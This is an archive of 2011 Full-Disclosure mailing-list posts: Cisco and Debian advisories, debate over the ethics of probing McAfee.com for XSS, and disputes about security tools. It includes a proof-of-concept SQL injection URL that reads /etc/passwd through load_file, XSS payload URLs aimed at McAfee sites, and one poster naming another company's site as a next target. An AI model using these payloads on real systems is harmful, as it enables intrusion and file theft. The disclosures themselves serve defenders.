authentication software. This misconfiguration may allow an unauthenticated user to access the protected network. This vulnerability may result in authentication bypass without requiring a valid username or password. This vulnerability is documented in Cisco Bug ID CSCtj66922 ( registered customers only) and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-0963. Vulnerability Scoring Details + Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss * CSCtj66922 - Authentication Bypass Vulnerability CVSS Base Score - 5.0 Access Vector -Network Access Complexity -Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level -Official-Fix Report Confidence -Confirmed Impact == Successful exploitation of the vulnerability may allow unauthorized users to access the protected network. Software Versions and Fixes === When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Software versions prior to 2.0.3 are affected by this vulnerability. Fixed software and workarounds are available for all NAC Guest Server devices. Workarounds === It is possible to modify the RADIUS configuration file of the Cisco NAC Guest Access Server to eliminate thepotential for authentication bypass. The following commands modify the RADIUS configuration line file and restart the RADIUS daemon to read the new configuration file. The configuration file may be modified by running the following command from the command-line interface (CLI) of the device: # cp /etc/raddb/radiusd.conf /etc/raddb/radiusd.conf.orig # sed -i 's/php -f/php/g' /etc/raddb/radiusd.conf # service radiusd restart Obtaining Fixed Software Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing
[Full-disclosure] Cisco Security Advisory: Cisco Secure Access Control System Unauthorized Password Change Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Cisco Secure Access Control System Unauthorized Password Change Vulnerability Advisory ID: cisco-sa-20110330-acs Revision 1.0 For Public Release 2011 March 30 1600 UTC (GMT) +- Summary === A vulnerability exists in some Cisco Secure Access Control System (ACS) versions that could allow a remote, unauthenticated attacker to change the password of any user account to any value without providing the account's previous password. Successful exploitation requires the user account to be defined on the internal identity store. This vulnerability does not allow an attacker to perform any other changes to the ACS database. That is, an attacker cannot change access policies, device properties, or any account attributes except the user password. Cisco has released free software updates that address this vulnerability. There is no workaround for this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml. Affected Products = Vulnerable Products +-- The following Cisco Secure ACS versions are affected by this vulnerability: * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any combination of these patches) installed and without patch 6 or later installed * Cisco Secure ACS version 5.2 without any patches installed * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these patches) installed and without patch 3 or later installed The previous list applies to both the hardware appliance and the software-only versions of the product. The following methods can be used to determine which version of the Cisco Secure ACS is installed: * From the Cisco Secure ACS command-line interface (CLI), issue the show version command, as shown in the following example: acs51a/admin# show version Cisco Application Deployment Engine OS Release: 1.2 ADE-OS Build Version: 1.2.0.152 ADE-OS System Architecture: i386 Copyright (c) 2005-2009 by Cisco Systems, Inc. All rights reserved. Hostname: acs51a Version information of installed applications - Cisco ACS VERSION INFORMATION - Version : 5.1.0.44.6 Internal Build ID : B.2347 Patches : 5-1-0-44-3 5-1-0-44-6 acs51a/admin# * On the main login page of the Cisco Secure ACS web-based interface, the version information is displayed on the left side of the screen. * From the Cisco Secure ACS web-based interface, log in and click the About link at the top right corner of the screen. Cisco Secure ACS version 5.1 will identify itself as version 5.1.0.44, whereas Cisco Secure ACS version 5.2 will identify itself as version 5.2.0.26. The presence of an additional digit after the version number indicates the highest patch level installed. For example, a version number of 5.1.0.44.3 indicates Cisco Secure ACS version 5.1 with up to patch 3 installed. The absence of any additional digit after the version string indicates a Cisco Secure ACS version with no patches installed. Products Confirmed Not Vulnerable + The following Cisco Secure ACS versions are not affected by this vulnerability: * Any Cisco Secure ACS version prior to version 5.1 * Cisco Secure ACS version 5.1 without any patches installed, or with patch 6 or later installed * Cisco Secure ACS version 5.1 with patch 1 or 2 (or both of these patches) installed * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any combination of these patches) installed, as long as patch 6 or later is also installed * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these patches) installed, as long as patch 3 or later is also installed * Cisco Secure ACS version 5.2 with patch 3 or later installed The previous list applies to both the hardware appliance and the software-only versions of the product. No other Cisco products are currently known to be affected by this vulnerability. Details === Cisco Secure ACS operates as a centralized RADIUS and TACACS+ server, combining user authentication, user and administrator device access control, and policy control into a centralized identity networking solution. A vulnerability exists in some Cisco Secure ACS versions that could allow a remote, unauthenticated attacker to change the password of any user account to any value without providing the account's previous password. Successful exploitation requires the user account to be defined on the internal identity store. This vulnerability cannot be used to change the password for the following types of users accounts: * User accounts that are defined on external identity
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group li...@yehg.net wrote: According to xssed.com, there are two remaining XSS issues: https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); // https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); // You guys know our disclosed issues are very simple and can easily be found through viewing HTML/JS source codes and simple Google Hacking (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com). However, it was criticized as 'illegal break-in' by Cenzic's CMO, http://www.cenzic.com/company/management/khera/, according to Network World News editor - Ellen Messmer. Thus, the next target is Cenzic web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner is. Too funny I wonder is Aaron Barr is consulting for Cenzic. Jeff [SNIP] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that matter), if anyone should understand that a XSS should really only be construed a 'criminal act' if it's indeed used to attack someone. If a group is taking the time out of their day to find and disclose issues to Mcafee, they should probably be thankful. What about finding a vulnerability in Mcafee's virus scanner? Could that be construed as a 'criminal act' if they disclose it? Where do you draw the line? Basically this sort of thing pushes the community into silence until something truly criminal happens. I'm not saying give anyone massive amounts of credit for publishing a few XSS bugs (because there's millions of them out there), but don't label them as a criminal for trying to help. That's just idiotic IMO. If you run an enterprise level solution for antivirus AND web vulnerability testing, the community understands that it's a process not unlike any other. There will be bugs, but it only demolishes the image of Mcafee to see them handle it like this in particular. If they would have been appreciative about it, and promptly fixed their website (or at the very least maintained friendly contact) this incident would have pretty much gone un-noticed. Look at LastPass as an example. http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html They had someone poking at their site, who managed to find a XSS bug using CRLF injections. They were appreciative of the find, 2.5 hrs later the issue was fixed, and there was that blog post about exactly what they were going to do about it. They took full responsibility for the fact that THEIR coding was to blame, and basically said 'This is what happened, and this is why it will probably never happen again'. This spoke hugely to me (as I'm sure it did the rest of the community) because it shows a company that's willing to admit it made a mistake, as opposed to sitting on their haunches and blaming people for looking for these sorts of bugs. Oh and not every customer of their service has to pay massive licensing fees, as there's a free version as well. In my mind at least this equates to a company that cares more about their customers that don't pay a single dime, then a company who forces people to pay massive amounts of coin for shaky automated scanning and services. That's just the way I see it though. Someone's gotta tell the emperor he has no clothes on. Ryan - Original Message - From: Jeffrey Walton noloa...@gmail.com To: YGN Ethical Hacker Group li...@yehg.net Cc: full-disclosure full-disclosure@lists.grok.org.uk Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group li...@yehg.net wrote: According to xssed.com, there are two remaining XSS issues: https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); // https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); // You guys know our disclosed issues are very simple and can easily be found through viewing HTML/JS source codes and simple Google Hacking (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com). However, it was criticized as 'illegal break-in' by Cenzic's CMO, http://www.cenzic.com/company/management/khera/, according to Network World News editor - Ellen Messmer. Thus, the next target is Cenzic web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner is. Too funny I wonder is Aaron Barr is consulting for Cenzic. Jeff [SNIP] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Well, I think there is a flip side to this, and that is the fact that no one is asking these people to inspect their sites for vulnerabilities. They are taking it upon themselves to scan the sites actively looking for vulnerabilities for the sole purpose of exposing them. They may say that they are doing it to ensure that the vendors fix their problems but it's not really any of their business to do so. I think someone would be hard pressed to justify (defend) their actions when they basically attack a site that they don't own, without permission, with the express intent of finding a vulnerability. That's the difference between a test and an attack. It doesn't matter how trivial their finds are, or what the outcome of the scan is, it is the fact that no one asked, nor wants them to do this. Technically, what they are doing is in fact illegal - in the US anyway. So there is another aspect of this that deserves some discussion, I think. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Ryan Sears Sent: Wednesday, March 30, 2011 10:45 AM To: noloa...@gmail.com Cc: full-disclosure Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that matter), if anyone should understand that a XSS should really only be construed a 'criminal act' if it's indeed used to attack someone. If a group is taking the time out of their day to find and disclose issues to Mcafee, they should probably be thankful. What about finding a vulnerability in Mcafee's virus scanner? Could that be construed as a 'criminal act' if they disclose it? Where do you draw the line? Basically this sort of thing pushes the community into silence until something truly criminal happens. I'm not saying give anyone massive amounts of credit for publishing a few XSS bugs (because there's millions of them out there), but don't label them as a criminal for trying to help. That's just idiotic IMO. If you run an enterprise level solution for antivirus AND web vulnerability testing, the community understands that it's a process not unlike any other. There will be bugs, but it only demolishes the image of Mcafee to see them handle it like this in particular. If they would have been appreciative about it, and promptly fixed their website (or at the very least maintained friendly contact) this incident would have pretty much gone un-noticed. Look at LastPass as an example. http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html They had someone poking at their site, who managed to find a XSS bug using CRLF injections. They were appreciative of the find, 2.5 hrs later the issue was fixed, and there was that blog post about exactly what they were going to do about it. They took full responsibility for the fact that THEIR coding was to blame, and basically said 'This is what happened, and this is why it will probably never happen again'. This spoke hugely to me (as I'm sure it did the rest of the community) because it shows a company that's willing to admit it made a mistake, as opposed to sitting on their haunches and blaming people for looking for these sorts of bugs. Oh and not every customer of their service has to pay massive licensing fees, as there's a free version as well. In my mind at least this equates to a company that cares more about their customers that don't pay a single dime, then a company who forces people to pay massive amounts of coin for shaky automated scanning and services. That's just the way I see it though. Someone's gotta tell the emperor he has no clothes on. Ryan - Original Message - From: Jeffrey Walton noloa...@gmail.com To: YGN Ethical Hacker Group li...@yehg.net Cc: full-disclosure full-disclosure@lists.grok.org.uk Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group li...@yehg.net wrote: According to xssed.com, there are two remaining XSS issues: https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); // https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); // You guys know our disclosed issues are very simple and can easily be found through viewing HTML/JS source codes and simple Google Hacking (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.m cafee.com). However, it was criticized as 'illegal break-in' by Cenzic's CMO, http://www.cenzic.com/company/management/khera/, according to Network World News editor - Ellen Messmer. Thus, the next target is Cenzic web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner is. Too funny I wonder is Aaron Barr is consulting for Cenzic. Jeff [SNIP] ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Steve, thanks to the community support we are able to afford a hosting for insect pro with unlimited bandwith. Now located in USA which allows higher transfer rates. We apologize if you got the wrong picture, but right now we don't need unofficial hosting... I don't care if you want to share it with whoever you want. I do appreciate your offer but we are going to pass this time. We have official releases almost every weeks. The latest version is on our own site and we started to share every new version with all our supporters, thus there is no need to include mirrors so far. If something comes up I'll let you know. I'm sending you the latest version of Insect Pro 2.5 to your personal email in a couple of minutes. If you have any questions, comments, or concerns, feel free to email me at jsa...@insecurityresearch.com Juan Sacco 2011/3/30 Steven Pinkham steve.pink...@gmail.com: runlvl wrote: The INSECT Pro version hosted on that site is really old, from what I see is the version 1.1 and is not an official version, on the other side. The version made available is older (2.0 version, not 1.1 as you claim), but it is an official version, or at least what you gave me as an official download. There is also a recompressed version with the same content for a smaller download size for people that want that. As I said before, I'll happily update the version hosted there to the newest version if you allow it. My download password stopped working at the time of the next release, and emails about it have been ignored. INSECT Pro 2.5 is free and we only ask for a donation to show interest. The amount of the donation is not fixed. Please, let's not start this up again. Your page clearly says you are buying a license, and has removed all comments about it being free. The licenses of the software you include (Metasploit and Skipfish) allow this, and there's no benefit to you making the claim of the software being free. You may or may not offer some licenses gratis, but that's different from the software being free in the sense that most people understand. If it's free, I'll happily host newer versions for free download for everyone. Otherwise, stick with the license language you have on your website. To be clear, I have no problem with you offering licenses for sale, offering licenses for donations, or making software freely available. Just do the one you are claiming to do please. -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Quoting runlvl run...@gmail.com: Steve, thanks to the community support we are able to afford a hosting for insect pro with unlimited bandwith. Now located in USA which allows higher transfer rates. We apologize if you got the wrong picture, but right now we don't need unofficial hosting... I don't care if you want to share it with whoever you want. I do appreciate your offer but we are going to pass this time. We have official releases almost every weeks. Thats funny, you seemed to be happy when he offered the mirror when he did in the past. Quoting Benji m...@b3nji.com The amount of the donation is not fixed. Can I make a 0 euro donation? I love that quote !, as the tool is supposed to be free, but with a forced donation. Honnestly, using FD to advertising a tool that is not free should not be autorized. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker
Hey Guys,
That's interesting reversing work and we appreciate your comments on the same.
This tool is from one of our contributing author, Neeraj
(appnimi.com). He is new into this tool development and protocols
where we acknowledge other's contribution in our work.
I have now talked to author and he will be introducing ACK section for
the same. Soon we will update on our pages too.
Generally we give complete credit to other's work however small it may be !
Thank you !
With Regards
Nagareshwar Talekar
http://SecurityXploded.com
http://PasswordForensics.com/
http://NetCertScanner.com
http://twitter.com/securityxploded
On Wed, Mar 30, 2011 at 8:29 PM, Tim tim-secur...@sentinelchicken.org wrote:
why do we need installer then? distribute that tool as single
executable.
Because without the installer, it can't try to monetize the install by
installing search toolbars! (It's nice enough to continue the install if you
reject their terms, though.)
On 2011-03-29, at 13:13, Jo Galara wrote:
How does it work? Bruteforce?
Yes, but... well, JAD does a better job of explaining than I possibly could:
Runtime rt = Runtime.getRuntime();
String str = 7z.exe x ;
str = str + \ + _filepath + \ ;
str = str + -p\ + pwd + \ ;
str = str + -o\ + _destpath + \;
str = str + -y;
System.out.println(str);
Process p = rt.exec(str);
p.waitFor();
if (p.exitValue() == 0)
{
ret = true;
}
That's funny (i.e. pathetic).
A quick search of the tool's website doesn't reveal any links to the
7-zip website. I'm not going to bother to download this tool, since a
1-line shell script would accomplish the same thing, but if 7-zip
isn't linked to in the accompanying documentation, then that would be
a violation of the LGPL. From 7-zip's FAQ:
Can I use the EXE or DLL files from 7-Zip in a Commercial Application?
Yes, but you are required to specify in your documentation (1) that
you used parts of the 7-Zip program, (2) that 7-Zip is licensed under
the GNU LGPL license and (3) you must give a link to www.7-zip.org,
where the source code can be found.
tim
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2208-1] bind9 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2208-1 secur...@debian.org http://www.debian.org/security/Florian Weimer March 30, 2011 http://www.debian.org/security/faq - - Package: bind9 Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2011-0414 It was discovered that BIND, a DNS server, contains a race condition when processing zones updates in an authoritative server, either through dynamic DNS updates or incremental zone transfer (IXFR). Such an update while processing a query could result in deadlock and denial of service. (CVE-2011-0414) In addition, this security update addresses a defect related to the processing of new DNSSEC DS records by the caching resolver, which may lead to name resolution failures in the delegated zone. If DNSSEC validation is enabled, this issue can make domains ending in .COM unavailable when the DS record for .COM is added to the DNS root zone on March 31st, 2011. An unpatched server which is affected by this issue can be restarted, thus re-enabling resolution of .COM domains. This workaround applies to the version in oldstable, too. Configurations not using DNSSEC validations are not affected by this second issue. For the oldstable distribution (lenny), the DS record issue will be fixed soon. (CVE-2011-0414 does not affect the lenny version.) For the stable distribution (squeeze), this problem has been fixed in version 1:9.7.3.dfsg-1~squeeze1. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 1:9.7.3.dfsg-1. We recommend that you upgrade your bind9 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJNk4LQAAoJEL97/wQC1SS+wH8IAJk6iM470E3CdS+R1lmEPL13 y1+wsx8O2kf9UreLOfSnGnP0TZTHaq5AIPU+To2ct5y9CP6QEamtsVv3zMGZhPER nUzfTYY/uf8/zCnlm8yFb8e1xozwwtqOJ9ybqnD8AD8FHQHW7HckPPzBwnCQWk3p R42MwM8n7iMJHZfgNI902/yE6GLRe12BZFAF91DXw6WBFZbh7AAwCAxNz2ZAbvmV IgICrlAoVpnh1FJJN4HyAAzoTUi4AV3fHuirK356jbuSGxmdYQPCsMusUifNStf/ M2NGeDaaWMzk9Uc/+2RjviEjimeLP+UwWVaIHtMVCuCS3lXELm/fG+7rJcvQJXk= =vq+V -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
How about the scenario in which one statically audit's some javascript sitting on a site, to notice it does something in an unsafe manner, and can be used in a XSS attack without actually making it happen?. There was no actual 'attacking' done, but there was still a vulnerability discovered. Is THAT considered an illegal act? Is putting a '3' into a web form/comment section considered attacking it if you look at the source to see how the character translated? What if you just wanted to make an ascii heart? My point is it's a very blurry line, and there are a lot of scenarios where one may discover a vulnerability without even having to do anything. As for the source code disclosures, there was absolutely no 'attacking' done. This was a huge oversight in the site devs, and they were giving that information to anyone who requested it, plain and simple. What about the Tumblr incident that happened a while ago? Just because they screwed up a production script, they ended up leaking massive amounts of internal infrastructure details, as well as private API keys, and other stuff that could be used for nefarious means. Is it illegal to visit that page? I think not, as THEY were putting the information out there (albeit by accident), but I as a user have no way to know that. I understand what you're saying about them not asking people to look for bugs, but it IS the internet. Companies don't typically ask external people to audit their executables either, but people do it for a number of reasons (mainly education). If they leave their site up, people will potentially poke at it. That's just the way it is. If I have a vested interest in a company (be it monetary or simply supporting it's cause), I personally want to see the site flourish, because I am then a part of that site. I want to make sure that my personal information is protected, and if I do find a bug somewhere, I report it. I recently found a XSS in OpenDNS's landing page, and they were very appreciative, very professional, and prompt to respond. This made me WANT to work with them further to ensure that their infrastructure was hardened to other forms of attack as well. I don't disclose these sorts of issues publicly, because I give the developers a chance to fix it, and in my past experience most companies are happy that I reported an issue, because I could have just as easily not said anything. If it does come down to it though, I follow my own public disclosure policy (http://talesofacoldadmin.com/disclosure.html) based off Rain Forest Puppy's. It basically just asks for somewhat consistent lines of communication after I disclose something. If the communication drops (or is non-existent), then it's at my own discretion to disclose it in a public forum. I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if choosing to disclose something (even in private) means potential legal troubles, then that takes away the motivation for me to disclose it in any form. I'm still going to be finding bugs for my own educational purposes, but I'll just stop disclosing them. That in itself starts to undermine the internet as a whole, leading to the restriction of information exchange, which is appalling. It IS technically illegal to do these sorts of tests without consent, but at what point DOES it become a 'test'? There's some cases, granted, in which the intention is clear (testing for blind SQL injections, etc) as they leave a huge footprint, but there's no explicitly clear line in which it becomes illegal. Is adding a ' to my name illegal? What if my 70+ year old grandmother did it by accident? Could she be persecuted as well? You can't apply the law to only some situations and not others. I also point you to one of my favorite XKCD's = http://xkcd.com/327/ Is naming your kid something like that technically illegal? Then that starts getting into free-speech issues, which are most certainly protected by the constitution. If I want my name to be Ann !@#$%^*() Hero, and the site doesn't explicitly tell me I can't do so, then how can I be expected to reasonably know where their boundaries are? I don't see any terms of use for using their website anywhere. This is all just my opinion though, and sorry for the long message! Ryan - Original Message - From: Thor (Hammer of God) t...@hammerofgod.com To: Ryan Sears rdse...@mtu.edu, noloa...@gmail.com Cc: full-disclosure full-disclosure@lists.grok.org.uk Sent: Wednesday, March 30, 2011 2:12:37 PM GMT -05:00 US/Canada Eastern Subject: RE: [Full-disclosure] Vulnerabilities in *McAfee.com Well, I think there is a flip side to this, and that is the fact that no one is asking these people to inspect their sites for vulnerabilities. They are taking it upon themselves to scan the sites actively looking for vulnerabilities for the sole purpose of exposing them. They may say that they are doing it to ensure that the vendors fix
[Full-disclosure] 'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)
'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in a_viewusers.php allowing for SQL injection of the 's' query parameter. II. TESTED VERSION --- 0.95.2 III. PoC EXPLOIT --- http://www.example.com/aphpkb/a_viewusers.php?s=1%20UNION%20SELECT%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200 IV. SOLUTION --- Upgrade to 0.95.3 or above. V. REFERENCES --- http://www.aphpkb.org/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1546 http://www.uncompiled.com/2011/03/cve-2011-1546/ VI. TIMELINE --- 03/13/2011 - Initial vendor disclosure 03/16/2011 - Vendor patched and released an updated version 03/16/2011 - Confirmed fix disclosure date 03/30/2011 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
Quoting Cal Leeming c...@foxwhisper.co.uk: What this really comes down to... Is the product *worth* donating to? If it is, then donate. If it isn't, then don't. I can't personally comment either way as I haven't tried it. I agree with you, but in order to test it you *must* donate. First time I see that. Unless you email the authors, or are a FD's subcriber and have used Steven's mirror. (pre 2.5 was tagged free, now it's tagged There is no fixed price to get a copy). I just mean, make a real licensing behind the tool if you want to sell it, or use a open licensing, but don't play with word in between. Playing the donation way can be complex, if a user want a receipt for their donation, can they produce it ? (I don't know USA law, but where I live only a official non-profit organisation can receive a 'donation'. Else it's simply considered a money gift). Their site advertise donation as 10, 50 and 100$, again, where I live you have the obligation to produce receipt for donation over 10$. But my point is simply they just don't look professionnal, and I judge them that way because they try to sell the product, not like a GPL source code or a freeware. -phil ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Nah, not from my POV anyway… I’m not concerned with who is attacking whom from where – I just tend to say something when people claim to be “ethical hackers” but then say they are going to target a security company because they criticizing the group for targeting people. It seems redundantly ironic. Or would that be ironically redundant? t From: andrew.wallace [mailto:andrew.wall...@rocketmail.com] Sent: Wednesday, March 30, 2011 1:10 PM To: noloa...@gmail.com; n...@myproxylists.com; c...@foxwhisper.co.uk; pa...@ximen.es; m...@b3nji.com; Thor (Hammer of God); uuf6...@gmail.com; rdse...@mtu.edu Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com Guys, Is it because these are Burmese hackers as to why everyone is getting in a pickle, e.g eastern hackers attacking western companies? I feel an Obama moment coming on, where he condemns the group known as YGN. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
I have that very strip printed and on the wall in my office :)You make several points, but the response that immediately comes to mind is that I actually see a difference between actively scanning content for structural/coding vulnerabilities, and entering data in a search box. I don't know if there is any basis for this legally, but I feel that if you put a box up and I can search for something, then I can put whatever I want in that box. You (the royal you) are basically soliciting people to put data in the box. However, you are not asking anyone to spider your site or run scans against it. That said, my guess is that it would all come down to intent. If I put ' or 1=1-- (like the site I had that some camper sniped) in, it's a pretty sure bet that I'm looking for SQL injection. But I don't know if the search box entitles me to do that. It certainly is interesting list fodder though... -Original Message- From: Ryan Sears [mailto:rdse...@mtu.edu] Sent: Wednesday, March 30, 2011 12:30 PM To: Thor (Hammer of God) Cc: full-disclosure; noloa...@gmail.com Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com How about the scenario in which one statically audit's some javascript sitting on a site, to notice it does something in an unsafe manner, and can be used in a XSS attack without actually making it happen?. There was no actual 'attacking' done, but there was still a vulnerability discovered. Is THAT considered an illegal act? Is putting a '3' into a web form/comment section considered attacking it if you look at the source to see how the character translated? What if you just wanted to make an ascii heart? My point is it's a very blurry line, and there are a lot of scenarios where one may discover a vulnerability without even having to do anything. As for the source code disclosures, there was absolutely no 'attacking' done. This was a huge oversight in the site devs, and they were giving that information to anyone who requested it, plain and simple. What about the Tumblr incident that happened a while ago? Just because they screwed up a production script, they ended up leaking massive amounts of internal infrastructure details, as well as private API keys, and other stuff that could be used for nefarious means. Is it illegal to visit that page? I think not, as THEY were putting the information out there (albeit by accident), but I as a user have no way to know that. I understand what you're saying about them not asking people to look for bugs, but it IS the internet. Companies don't typically ask external people to audit their executables either, but people do it for a number of reasons (mainly education). If they leave their site up, people will potentially poke at it. That's just the way it is. If I have a vested interest in a company (be it monetary or simply supporting it's cause), I personally want to see the site flourish, because I am then a part of that site. I want to make sure that my personal information is protected, and if I do find a bug somewhere, I report it. I recently found a XSS in OpenDNS's landing page, and they were very appreciative, very professional, and prompt to respond. This made me WANT to work with them further to ensure that their infrastructure was hardened to other forms of attack as well. I don't disclose these sorts of issues publicly, because I give the developers a chance to fix it, and in my past experience most companies are happy that I reported an issue, because I could have just as easily not said anything. If it does come down to it though, I follow my own public disclosure policy (http://talesofacoldadmin.com/disclosure.html) based off Rain Forest Puppy's. It basically just asks for somewhat consistent lines of communication after I disclose something. If the communication drops (or is non-existent), then it's at my own discretion to disclose it in a public forum. I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if choosing to disclose something (even in private) means potential legal troubles, then that takes away the motivation for me to disclose it in any form. I'm still going to be finding bugs for my own educational purposes, but I'll just stop disclosing them. That in itself starts to undermine the internet as a whole, leading to the restriction of information exchange, which is appalling. It IS technically illegal to do these sorts of tests without consent, but at what point DOES it become a 'test'? There's some cases, granted, in which the intention is clear (testing for blind SQL injections, etc) as they leave a huge footprint, but there's no explicitly clear line in which it becomes illegal. Is adding a ' to my name illegal? What if my 70+ year old grandmother did it by accident? Could she be persecuted as well? You can't apply the law to only some situations and not others. I also point you to one of my favorite XKCD's = http://xkcd.com/327/ Is naming your kid
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I have that very strip printed and on the wall in my office :) You make several points, but the response that immediately comes to mind is that I actually see a difference between actively scanning content for structural/coding vulnerabilities, and entering data in a search box. I don't know if there is any basis for this legally, but I feel that if you put a box up and I can search for something, then I can put whatever I want in that box. You (the royal you) are basically soliciting people to put data in the box. However, you are not asking anyone to spider your site or run scans against it. If a person or company places a host on the public internet and offers a service, I don't think its reasonable to claim some input is fair and other input is unfair. Perhaps the person or company should not offer public services in the first place. It seems reasonable (to me) that users of the site expect that the site is relatively defect free and secure. A tech-savy user who tests the site through its public interface is simply exercising due diligence before using the services of the site. I personally feel that individuals and companies which want to criminalize 'due diligence' is cowardly at best. I don't want to use the services of such a site; nor do I want to have an account on such a system. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
